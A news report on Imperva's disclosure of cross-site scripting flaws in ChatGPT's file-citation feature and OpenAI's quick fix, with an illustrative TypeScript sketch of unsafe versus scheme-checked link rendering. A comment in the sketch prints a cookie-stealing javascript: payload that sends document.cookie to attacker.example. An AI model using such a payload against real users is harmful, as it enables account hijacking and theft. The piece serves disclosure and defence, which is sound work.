OpenAI Patches Critical ChatGPT Security Holes, Averting Potential User Account Hijacks


Security researchers have uncovered multiple vulnerabilities in OpenAI’s ChatGPT that could allow attackers to take over unsuspecting users’ accounts.

According to a report published Tuesday by security firm Imperva, researchers identified two cross-site scripting (XSS) vulnerabilities and other security issues in ChatGPT that malicious hackers could exploit to hijack a user’s account.

ChatGPT allows users to upload files and ask questions about them. Imperva found that the feature that processes these files and provides a clickable citation icon could be manipulated: depending on the contents of the uploaded file, the citation ChatGPT generates could itself become a security threat.

Exploiting this vulnerability is not straightforward, however. It requires the victim to upload a malicious file, engage with ChatGPT in a way that prompts it to quote from that file, and then click the resulting citation to trigger the flaw.
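To illustrate the general class of bug described above, the sketch below shows, in TypeScript against the browser DOM, how a citation link built from attacker-controlled file content can become a script-execution vector, and how allow-listing URL schemes blocks it. This is a hypothetical illustration only: the function names and the citation flow are assumptions, not OpenAI’s actual code or necessarily the precise mechanism Imperva reported.

```typescript
// Hypothetical illustration of the XSS class described above; not OpenAI's code.
// Scenario: a chat UI turns a URL found inside an uploaded file into a clickable
// citation. If that URL is attacker-controlled, a "javascript:" scheme would run
// script in the victim's session the moment the citation is clicked.

function renderCitationUnsafe(container: HTMLElement, citationUrl: string): void {
  const link = document.createElement("a");
  link.href = citationUrl; // no validation: "javascript:..." is accepted verbatim
  link.textContent = "Source";
  container.appendChild(link);
}

function renderCitationSafe(container: HTMLElement, citationUrl: string): void {
  let parsed: URL;
  try {
    parsed = new URL(citationUrl, window.location.origin);
  } catch {
    return; // malformed URL: render nothing
  }
  // Allow only http(s) targets; reject javascript:, data:, and other schemes.
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") {
    return;
  }
  const link = document.createElement("a");
  link.href = parsed.toString();
  link.rel = "noopener noreferrer";
  link.target = "_blank";
  link.textContent = "Source";
  container.appendChild(link);
}

// Example payload a malicious document could embed as its "citation" URL:
//   javascript:fetch("https://attacker.example/steal?c=" + document.cookie)
// renderCitationUnsafe() makes it clickable; renderCitationSafe() silently drops it.
```

Allow-listing URL schemes before rendering anything clickable is the standard defense against this class of issue.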

The research firm reported these vulnerabilities to OpenAI and noted that they were fixed by the AI startup “within hours.”

This discovery comes amid growing concern about the use of AI tools like ChatGPT in cyberattacks. Earlier in February, Microsoft Corp. and OpenAI revealed that hackers had used large language models like ChatGPT to refine their cyberattacks. Hackers from countries including Russia, North Korea, Iran, and China were found to be using such tools to research targets, improve scripts, and develop social engineering techniques.

OpenAI had previously launched a bug bounty program offering rewards of up to $20,000 to encourage researchers to find and report flaws in its systems. The latest findings underscore the value of such programs in keeping AI systems secure.

As AI technologies become more embedded in daily life, it is crucial for companies to prioritize security and address vulnerabilities promptly. The issues uncovered in OpenAI’s ChatGPT are a reminder of the need for rigorous security practices in the development and deployment of AI systems.
